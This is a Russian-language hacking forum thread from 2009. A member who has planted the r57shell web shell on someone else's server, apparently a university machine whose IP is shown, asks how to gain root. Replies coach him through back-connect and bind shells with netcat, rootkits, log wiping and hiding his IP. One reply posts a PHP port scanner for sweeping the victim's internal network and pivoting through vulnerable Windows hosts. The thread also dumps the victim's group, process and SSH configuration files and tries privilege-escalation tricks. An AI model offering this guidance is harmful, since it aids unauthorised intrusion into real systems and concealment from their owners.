PDA

Просмотр полной версии : Имею пароль рута удалённой машины


InFlame
23.01.2009, 18:52
Вопрос: как пожно подключиться по SSH или Telnet с правами root?

groundhog
23.01.2009, 18:55
SSH-клиентом или TELNET-клиентом, при условии, что не идёт резка по айпишникам.

InFlame
23.01.2009, 19:01
SSH-клиентом или TELNET-клиентом, при условии, что не идёт резка по айпишникам.
Ну это понятно. Я ввожу IP сайта в прогу PuTTy, а он не коннектит ни SSH, ни TELNET. Как быть?
Если что на серваке залит r57shell.

groundhog
23.01.2009, 19:06
InFlame, а ты сканил хост? Порты этих сервисов открыты?

gold-goblin
23.01.2009, 19:08
пиля а через шел не проще?

InFlame
23.01.2009, 19:39
tcp4 0 0 *.1234 *.* LISTEN
tcp4 0 0 *.11457 *.* LISTEN
tcp4 0 0 *.22 *.* LISTEN
tcp6 0 0 *.22 *.* LISTEN
tcp46 0 0 *.443 *.* LISTEN
tcp46 0 0 *.80 *.* LISTEN
tcp4 0 0 *.995 *.* LISTEN
tcp4 0 0 *.110 *.* LISTEN
tcp4 0 0 *.993 *.* LISTEN
tcp4 0 0 *.143 *.* LISTEN
tcp4 0 0 *.25 *.* LISTEN
tcp4 0 0 *.3306 *.* LISTEN
tcp4 0 0 *.21 *.* LISTEN
tcp6 0 0 ::1.953 *.* LISTEN
tcp4 0 0 127.0.0.1.953 *.* LISTEN
tcp4 0 0 127.0.0.1.53 *.* LISTEN
tcp4 0 0 79.135.74.40.53 *.* LISTEN
tcp4 0 0 192.168.0.3.53 *.* LISTEN

Эти порты выдаёт r57shell. Как видно 22 порт открыт, но PuTTy не коннектит.

groundhog
23.01.2009, 19:44
Адрес ты какой вбиваешь?

InFlame
23.01.2009, 19:56
В виде IP и ***.ru пробовал.

InFlame
24.01.2009, 17:15
И в чём же проблема? Как подключиться?

AkyHa_MaTaTa
24.01.2009, 17:43
может руту запрешен логин по ssh или telnet(ну это навярняка), или для конекта по ssh идет привязка к ip.

InFlame
24.01.2009, 18:26
При подключении вылетает ошибка: Time out

AkyHa_MaTaTa
24.01.2009, 18:36
tcp4 0 0 *.1234 *.* LISTEN
tcp4 0 0 *.11457 *.* LISTEN
tcp4 0 0 *.22 *.* LISTEN
tcp6 0 0 *.22 *.* LISTEN
tcp46 0 0 *.443 *.* LISTEN
tcp46 0 0 *.80 *.* LISTEN
tcp4 0 0 *.995 *.* LISTEN
tcp4 0 0 *.110 *.* LISTEN
tcp4 0 0 *.993 *.* LISTEN
tcp4 0 0 *.143 *.* LISTEN
tcp4 0 0 *.25 *.* LISTEN
tcp4 0 0 *.3306 *.* LISTEN
tcp4 0 0 *.21 *.* LISTEN
tcp6 0 0 ::1.953 *.* LISTEN
tcp4 0 0 127.0.0.1.953 *.* LISTEN
tcp4 0 0 127.0.0.1.53 *.* LISTEN
tcp4 0 0 79.135.74.40.53 *.* LISTEN
tcp4 0 0 192.168.0.3.53 *.* LISTEN

Эти порты выдаёт r57shell. Как видно 22 порт открыт, но PuTTy не коннектит.
А что толку,порты то открыты, но может(и наверника) впереди стоит фаервол с фильтрацией по ип, судя по Time out порт закрыт для тебя, если 79.135.74.40 - ип твоего сайта - то там нет открытого порта 22(ssh) для ип моего сокса.

POS_troi
24.01.2009, 18:43
Авторизация по Сертификату.
Ограничение на IP

засветил IP 79.135.74.40

то там нет открытого порта 22(ssh) для ип моего сокса.

Аналогично, Скорее всего SSH только для 192.168.0/24

ртуть
24.01.2009, 19:04
насколько я знаю, root по умолчанию запрещен доступ по ssh в целях безопасности соития ;)

при идеальных условиях, логинешься под юзером, делаешь su -
вводишь пасс рута

InFlame
24.01.2009, 19:11
при идеальных условиях, логинешься под юзером, делаешь su -
вводишь пасс рута
Можно поподробней? :)

Gorev
24.01.2009, 19:13
login: user
pass: ********


user: -su ili -sudo
enter password: passroota

POS_troi
24.01.2009, 19:17
насколько я знаю, root по умолчанию запрещен доступ по ssh в целях безопасности соития

во FreeBSD не по умолчанию.

ртуть
24.01.2009, 19:23
ТС, а чем тебя криптованный шелл-канал не устраивает?? ведь твои коннекты в логах осядают или ты каждый раз логклинер запускаешь..?? поставь руткит и юзай спокойной ^_^

InFlame
24.01.2009, 19:24
Я не понял куда вводить логин и пасс? Куда команды вводить su и sudo?

AkyHa_MaTaTa
24.01.2009, 19:26
насколько я знаю, root по умолчанию запрещен доступ по ssh в целях безопасности соития ;)

при идеальных условиях, логинешься под юзером, делаешь su -
вводишь пасс рута
в идеале надо сначало законектится, а у него это не выходит.

ртуть
24.01.2009, 19:29
пусть через биндшелл или конектбэк шелл )
последний вариант обязан прокатить

InFlame
24.01.2009, 19:33
А может шелл какой-нибудь посоветуете, в котором можно проделать вышесказанное. То есть войти под рута из-под шелла на php, например. В r57shell не получается.

InFlame
24.01.2009, 19:37
пусть через биндшелл или конектбэк шелл )
последний вариант обязан прокатить
В r57shell есть такое, вот только я не понимаю как его юзать. Вообще это у меня первый опыт, поручивания серваков... :)

ртуть
24.01.2009, 19:39
То есть войти под рута из-под шелла на php, например. В r57shell не получается.

школьнег, php интерпретатор работает из под nobody или от userid, но никак из под root ;) если админ не далбаёб и не коперфильддд

POS_troi
24.01.2009, 19:39
Вообще это у меня первый опыт, поручивания серваков...

Главное чтобы не последний

####
####
####

=)

InFlame
24.01.2009, 20:01
школьнег, php интерпретатор работает из под nobody или от userid, но никак из под root ;) если админ не далбаёб и не коперфильддд
Я имел в виду не просто так войти под root, а используя команду su.

ртуть
24.01.2009, 20:04
не получицо :)
не парься... заливай биндшелл, запускай его и конектся, а там уже руть
либо делай конектбэк шелл
если ничего не получаеца, отдай шелл мне :) я из него электронную библиотеку сделаю

ртуть
24.01.2009, 20:08
http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchtype=archives&counts=50&searchvalue=backdoor++

InFlame
24.01.2009, 20:42
А как воспользоваться встроенным в r57shell бек-коннектом?

ртуть
24.01.2009, 20:57
нужен netcat

запускаешь его слушать определенный порт у себя на компутере.....

в шеле выставляешь порт, свой айпи и жмахаешь кнопку пуск или что там еще....и у себя в netcat'e юзаешь шелл :)

гугл более ясно тебе бы все это объяснил

InFlame
25.01.2009, 11:43
А если я в бэк коннекте свой ай пи указал, админы его не спалят?

SpangeBoB
25.01.2009, 15:09
А если я в бэк коннекте свой ай пи указал, админы его не спалят?
Вы ответили на свой вопрос-" в бэк коннекте свой ай пи указал"

POS_troi
25.01.2009, 15:16
А если я в бэк коннекте свой ай пи указал, админы его не спалят?

Свой IP указывать нигде вобще не стоит как вариант юзайте VPN тут на форуме грины какраз предоставляют OpenVPN сервис не дорого.

InFlame
25.01.2009, 16:02
Вы ответили на свой вопрос-" в бэк коннекте свой ай пи указал"
В каких тогда логах он остаётся?

POS_troi
25.01.2009, 19:02
как вариант /var/log/wtmp, /var/run/utmp и /var/log/lastlog а вобще все зависит от того как система настроена. у меня например не один сервак не пишет только в стандартные логи все заркалируется в дебрях системы



вобщем покапайся в /var/ там много интересного.

да еще и httpd лог

InFlame
25.01.2009, 19:50
Удачно захожу через бэк-коннект, ввожу команду su, он мне выдаёт: "su: Sorry".
Что мне делать в таком случае?

AkyHa_MaTaTa
25.01.2009, 19:55
Удачно захожу через бэк-коннект, ввожу команду su, он мне выдаёт: "su: Sorry".
Что мне делать в таком случае?
ясный пень что твой бак конект не в входит в группу whel, скорей всего у тебя nobody.

InFlame
25.01.2009, 20:02
ясный пень что твой бак конект не в входит в группу whel, скорей всего у тебя nobody.
У меня не nobody. Захожу под учёткой сайта.
Тогда как мне под рута зайти?

POS_troi
25.01.2009, 20:05
в файле /etc/group

Нужно добавить твоего пользователя =)

Но так как в этот файл пишет только РУТ то и писать не сможеш =)


У меня не nobody. Захожу под учёткой сайта.

ну не nobody а WWW или HTTPD всеравно не один из этих учеток во Whell никогда сидеть не будет.

AkyHa_MaTaTa
25.01.2009, 20:10
У меня не nobody. Захожу под учёткой сайта.
Тогда как мне под рута зайти?
ну во первых, id, во вторых cat /etc/group ну и возможно
cat /etc/sudoers, что бы можно было о чем судить, если у тебя конечно хватит прав на чтения.

POS_troi
25.01.2009, 20:18
Как вариант рассуждаем:

У нас есть сервак и походу он является университетским тоесть состоит в сети 192.168.0/24.

Вполне возможно и даже скорее всего что в этой сети юзаются компы с Windows Xp и вполне возможно есть дырявая.

Проверяем сервак на предмет наличия популярных сканеров портов и если есть то сканим всю поддсеть, если нет то выход может быть такой



Источник кода security-teams.ne

################################################## ###
#!/usr/local/bin/php
<?
class thread
{
function sock($net,$p)
{
@$sock = fsockopen($net,$p,$errno, $errstr,5);
if($sock == true) {print $p." - open\n";} else { print $p." - close\n"; }
if($p == 21) $this->ftp_valid($sock); else;
@fclose($sock);
}
function self($line)
{
list($code,$mesg)=split(' ',$line,2);
print $code." ".$mesg."\r\n";
return $code;
}
function ftp_valid($sock)
{
print "#############проверка на анонимный FTP доступ############\n";
$line=fgets($sock);
$code = $this->self($line);
if($code == 220)
{
fwrite($sock,"user anonymous\r\n");
$line=fgets($sock);
$code = $this->self($line);
if($code == 331)
{
fwrite($sock,"pass jonny@localhost.com\r\n");
$line=fgets($sock);
$code = $this->self($line);
}
else;
}
else;
print "################################################## ############\n";
}
function open_relay($sock)
{


}
}

if(empty($argv[2]))
{$port = array(21,22,23,24,25,80,81,110,143,135,139,445,330 6,3124,3128,3389,8080);}
elseif($argv[2]=="all")
{
$j=1;
while($j<=10000)
{
$port[]=$j;
$j++;
}
}
else
{ print "Wrong parametr!!!\n";}



$object = new thread();
$i = 0;

if(!empty($argv[1]))
{
$host = $argv[1];
print "Host $host is scanned....\n";
while(isset($port[$i]))
{
$p = $port[$i];
$object->sock($host,$p);
$i++;
}
}
else;
?>

################################################## ###



$ ./ports.php [Адрес жертвы] [port [all]] | grep open

Ищем машины с портами которые как правило юзаются виндами и далее пробуем сплойтами пробить машинку + при удаче установить консольный SSH клиент и юзать связку

WebShell -> Телнет Винды --> SSH WEB сервака

Примерно так..

При условии что SSH тупо не забит только на один IP админа.

InFlame
25.01.2009, 20:28
cat /etc/group
# $FreeBSD: src/etc/group,v 1.35 2007/06/11 18:36:39 ceri Exp $
#
wheel:*:0:root
daemon:*:1:
kmem:*:2:
sys:*:3:
tty:*:4:
operator:*:5:root
mail:*:6:postfix
bin:*:7:
news:*:8:
man:*:9:
games:*:13:
ftp:*:14:
staff:*:20:
sshd:*:22:
smmsp:*:25:
mailnull:*:26:
guest:*:31:
bind:*:53:
proxy:*:62:
authpf:*:63:
_pflogd:*:64:
_dhcp:*:65:
uucp:*:66:
dialer:*:68:
network:*:69:
audit:*:77:
www:*:80:
nogroup:*:65533:
nobody:*:65534:
messagebus:*:556:
polkit:*:562:
mgradmin:*:1000:
mgrreseller:*:1001:
mgrsecure:*:1002:user_ugkp,user_gras,user_smart,us er_gm144
cyrus:*:60:
postfix:*:125:
maildrop:*:126:
dovecot:*:143:
mysql:*:88:
user_ugkp:*:1004:
user_gras:*:1005:
user_smart:*:1006:
fetchmail:*:124:
squid:*:100:
cups:*:193:
user_gm144:*:1007:
cat /etc/sudoers
cat: /etc/sudoers: No such file or directory


id
uid=1026(user_gm144) gid=1007(user_gm144) groups=1007(user_gm144),1002(mgrsecure)

Что дальше? :)

POS_troi
25.01.2009, 20:48
ну все что осталось это прописать в

/etc/group

wheel:*:0:root,user_gm144

:)

InFlame
25.01.2009, 20:54
ну все что осталось это прописать в

/etc/group

wheel:*:0:root,user_gm144

:)
Прав не хватает.

POS_troi
25.01.2009, 21:01
Знаю =)

Кстати этот сервер тебе уже поиграться только, утром админ спалит ибо наследил уже хорошо (при учете что админ там есть и ему не пофигу)

ls -l /etc/ssh

Вывод в студию.

Иногда встречаються серваки у которых на sshd_config встречаються права 777 =)

кстати заодно и

cat /etc/ssh/sshd_config

ртуть
25.01.2009, 21:24
ТС, бросай все это, размагничивай и сжигай комп пока не поздно, хотя.... кароче, наверное, уже выехали :(

POS_troi
25.01.2009, 21:35
кароче, наверное, уже выехали

не пугай так ТС, все когдато игрались =)

И все же мне очень интересно какой там админ, шелл завтра снесут или будет жить =)

InFlame
25.01.2009, 21:45
Шелл уже 3 дня живёт. И забыл написать, что имею доступ из-под рута к MySQL. Может получиться через MySQL сделать ту запись в файл, чтобы зайти под рута?
Рут мне нужен что бы не просто поиграться. Логи ведь надо почистить все... :rolleyes:

POS_troi
25.01.2009, 22:06
Вывод

ps -U root

В студию, предыдущие из 45 поста тоже желательно

InFlame
26.01.2009, 08:48
ps -U root
PID TT STAT TIME COMMAND
0 ?? WLs 0:00.01 [swapper]
1 ?? SLs 0:00.01 /sbin/init --
2 ?? DL 0:08.57 [g_event]
3 ?? DL 0:15.62 [g_up]
4 ?? DL 0:16.88 [g_down]
5 ?? DL 0:00.00 [thread taskq]
6 ?? DL 0:00.00 [acpi_task_0]
7 ?? DL 0:00.00 [acpi_task_1]
8 ?? DL 0:00.00 [acpi_task_2]
9 ?? DL 0:00.00 [xpt_thrd]
10 ?? DL 0:00.00 [audit]
11 ?? RL 5588:57.04 [idle: cpu3]
12 ?? RL 5588:40.67 [idle: cpu2]
13 ?? RL 5572:06.55 [idle: cpu1]
14 ?? RL 5521:42.77 [idle: cpu0]
15 ?? WL 63:37.48 [swi4: clock sio]
16 ?? WL 0:00.00 [swi3: vm]
17 ?? WL 0:00.90 [swi1: net]
18 ?? DL 0:08.80 [yarrow]
19 ?? WL 0:00.02 [swi5: +]
20 ?? WL 0:00.00 [swi6: Giant taskq]
21 ?? WL 0:00.00 [swi6: task queue]
22 ?? WL 0:03.67 [swi2: cambio]
23 ?? DL 0:00.00 [kqueue taskq]
24 ?? WL 0:00.00 [irq9: acpi0]
25 ?? WL 0:01.72 [irq16: mpt0]
26 ?? DL 0:00.00 [mpt_recovery0]
27 ?? DL 0:05.90 [em0 taskq]
28 ?? DL 0:25.32 [em1 taskq]
29 ?? WL 0:00.00 [irq23: uhci0 uhci+]
30 ?? DL 0:00.05 [usb0]
31 ?? DL 0:00.00 [usbtask-hc]
32 ?? DL 0:00.00 [usbtask-dr]
33 ?? WL 0:00.00 [irq22: uhci1 uhci3]
34 ?? DL 0:00.05 [usb1]
35 ?? DL 0:00.05 [usb2]
36 ?? DL 0:00.05 [usb3]
37 ?? DL 0:00.05 [usb4]
38 ?? WL 0:00.00 [irq14: ata0]
39 ?? WL 0:00.00 [irq15: ata1]
40 ?? WL 0:00.00 [irq20: atapci1]
41 ?? WL 0:00.00 [swi0: sio]
42 ?? WL 0:00.00 [irq1: atkbd0]
43 ?? WL 0:00.01 [irq12: psm0]
44 ?? DL 0:00.00 [sctp_iterator]
45 ?? DL 0:00.55 [pagedaemon]
46 ?? DL 0:00.00 [vmdaemon]
47 ?? DL 0:00.01 [pagezero]
48 ?? DL 0:01.33
49 ?? DL 0:01.36 [vnlru]
50 ?? DL 8:25.24 [syncer]
51 ?? DL 0:02.00 [softdepflush]
52 ?? DL 0:14.95 [schedcpu]
142 ?? Is 0:00.00 adjkerntz -i
430 ?? Is 0:00.22 /sbin/devd
844 ?? Ss 0:02.34 /usr/sbin/syslogd -l /var/run/log -l /var/named/var/r
1149 ?? Is 0:08.51 /usr/local/libexec/postfix/master
1173 ?? Ss 0:07.31 /usr/local/sbin/dovecot
1174 ?? S 0:08.80 dovecot-auth
1182 ?? Ss 0:05.90 /usr/local/sbin/httpd -DNOHTTPACCEPT
1208 ?? Is 0:00.24 /usr/sbin/sshd
1213 ?? Ss 0:00.93 /usr/sbin/cron -s
1228 ?? Is 0:00.27 /usr/sbin/moused -p /dev/psm0 -t auto
1255 ?? Is 0:00.28 /usr/sbin/inetd -wW -C 60
6163 ?? S 0:00.59 /usr/local/ispmgr/bin/ispmgr
1276 v0 Is+ 0:00.00 /usr/libexec/getty Pc ttyv0
1277 v1 Is+ 0:00.00 /usr/libexec/getty Pc ttyv1
1278 v2 Is+ 0:00.00 /usr/libexec/getty Pc ttyv2
1279 v3 Is+ 0:00.00 /usr/libexec/getty Pc ttyv3
1280 v4 Is+ 0:00.00 /usr/libexec/getty Pc ttyv4
1281 v5 Is+ 0:00.00 /usr/libexec/getty Pc ttyv5
1282 v6 Is+ 0:00.00 /usr/libexec/getty Pc ttyv6
1283 v7 Is+ 0:00.00 /usr/libexec/getty Pc ttyv7
1097 con- S+ 0:25.53 /usr/local/bin/samsdaemon

[B]ls -l /etc/ssh
total 296
-rw-r--r-- 1 root wheel 132839 Feb 24 2008 moduli
-rw-r--r-- 1 root wheel 1533 Feb 24 2008 ssh_config
-rw------- 1 root wheel 668 Jul 31 14:14 ssh_host_dsa_key
-rw-r--r-- 1 root wheel 595 Jul 31 14:14 ssh_host_dsa_key.pub
-rw------- 1 root wheel 520 Jul 31 14:14 ssh_host_key
-rw-r--r-- 1 root wheel 324 Jul 31 14:14 ssh_host_key.pub
-rw------- 1 root wheel 1675 Jul 31 14:14 ssh_host_rsa_key
-rw-r--r-- 1 root wheel 387 Jul 31 14:14 ssh_host_rsa_key.pub
-rw-r--r-- 1 root wheel 3241 Aug 5 11:55 sshd_config

cat /etc/ssh/sshd_config
# $OpenBSD: sshd_config,v 1.74 2006/07/19 13:07:10 dtucker Exp $
# $FreeBSD: src/crypto/openssh/sshd_config,v 1.47 2006/11/10 16:52:41 des
Exp $

# This is the sshd server system-wide configuration file. See
# sshd_config(5) for more information.

# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented. Uncommented options change a
# default value.

# Note that some of FreeBSD's defaults differ from OpenBSD's, and
# FreeBSD has a few additional options.

#VersionAddendum FreeBSD-20061110

#Port 22
#Protocol 2
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

# HostKey for protocol version 1
#HostKey /etc/ssh/ssh_host_key
# HostKeys for protocol version 2
#HostKey /etc/ssh/ssh_host_dsa_key

# Lifetime and size of ephemeral version 1 server key
#KeyRegenerationInterval 1h
#ServerKeyBits 768

# Logging
# obsoletes QuietMode and FascistLogging
#SyslogFacility AUTH
#LogLevel INFO

# Authentication:

#LoginGraceTime 2m
#PermitRootLogin no
#StrictModes yes
#MaxAuthTries 6

#RSAAuthentication yes
#PubkeyAuthentication yes
#AuthorizedKeysFile .ssh/authorized_keys

# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#RhostsRSAAuthentication no
# similar for protocol version 2
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# RhostsRSAAuthentication and HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes

# Change to yes to enable built-in password authentication.
PasswordAuthentication yes
#PermitEmptyPasswords no

# Change to no to disable PAM authentication
#ChallengeResponseAuthentication yes

# Kerberos options
#KerberosAuthentication no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
#KerberosGetAFSToken no

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes

# Set this to 'no' to disable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication. Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
#UsePAM yes

#AllowTcpForwarding yes
#GatewayPorts no
#X11Forwarding yes
#X11DisplayOffset 10
#X11UseLocalhost yes
#PrintMotd yes
#PrintLastLog yes
#TCPKeepAlive yes
#UseLogin no
#UsePrivilegeSeparation yes
#PermitUserEnvironment no
Compression yes
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS yes
#PidFile /var/run/sshd.pid
#MaxStartups 10
#PermitTunnel no

# no default banner path
#Banner /some/path

# override default of no subsystems
Subsystem sftp /usr/libexec/sftp-server

# Example of overriding settings on a per-user basis
#Match User anoncvs
# X11Forwarding no
# AllowTcpForwarding no
# ForceCommand cvs server
А доступ к мускулу с правами рута что ли ничего не даёт? Например через into outfile подредактировать файл /etc/group.

POS_troi
26.01.2009, 12:16
Для этого процесс мускуля должен быть запущен из под рута ну и иметь его права =)

Поэтому и просил у тебя ps -U чтобы просмотреть а не запущен ли ;)

SSH имеет обычную парольную аутентификацию снаружи закрыт фаерволом.

Еще наводка :

Поищи в /etc/ скриптик с правилами фаервола, при настройке частенько на него ставят 777 и иногда забывают снять.


О.. как называется скрипт можеш глянуть в /etc/rc.conf

InFlame
26.01.2009, 17:06
cat /etc/firewall.conf
50928 -rw------- 1 root wheel 0 Oct 8 09:53 firewall.conf
Error! Can't read file /etc/firewall.conf
Вот так вот =| Значит облом мне с рутом? =(

ртуть
26.01.2009, 22:24
поломай еще)

InFlame
27.01.2009, 15:46
поломай еще)
Какие ещё тогда идеи подскажешь? ;)

TolkiN
28.01.2009, 17:16
Приветствую всех! :)

Подскажите, пожалуйста, пытаюсь сделать бэкконнект через r57.
Запускаю NetCat, ввожу nc -l -p 11457, нажимаю Enter и NetCat исчезает.
Далее в самом шелле ничего не меняю в настройках бэкконнекта (порт 11457 и IP здесь всё верно). Жму "Выполнить" и шелл отдаёт мне следующее: "Now script try connect to (здесь IP) port 11457 ..."

Пробовал это сделать на нескольких шеллах и так абсолютно на всех шеллах.
У себя файрвол отключаю.

zeppe1in
28.01.2009, 17:42
Если ssh закрыт фаером то нам поможет датапайп не? или тупо конектим к бинд шелу а оттуда конектим к ssh.

POS_troi
28.01.2009, 17:48
У себя файрвол отключаю.

Пожалуйста, также выкладывайте инфу о вашем подключении к Глобальной сети, ADSL, Dial-UP, Sity Local Network и т.д.

Если юзаете локалку то вполне возможно что на шлюзе порезано все что только можно.

TolkiN
28.01.2009, 18:37
Пожалуйста, также выкладывайте инфу о вашем подключении к Глобальной сети, ADSL, Dial-UP, Sity Local Network и т.д.

ADSL (не локалка)

asdewqaz
27.05.2009, 20:25
Добрый вечер
Странно, когда я ввожу логин и пароль - ssh (putty) и программа сразу выходит. Что делать?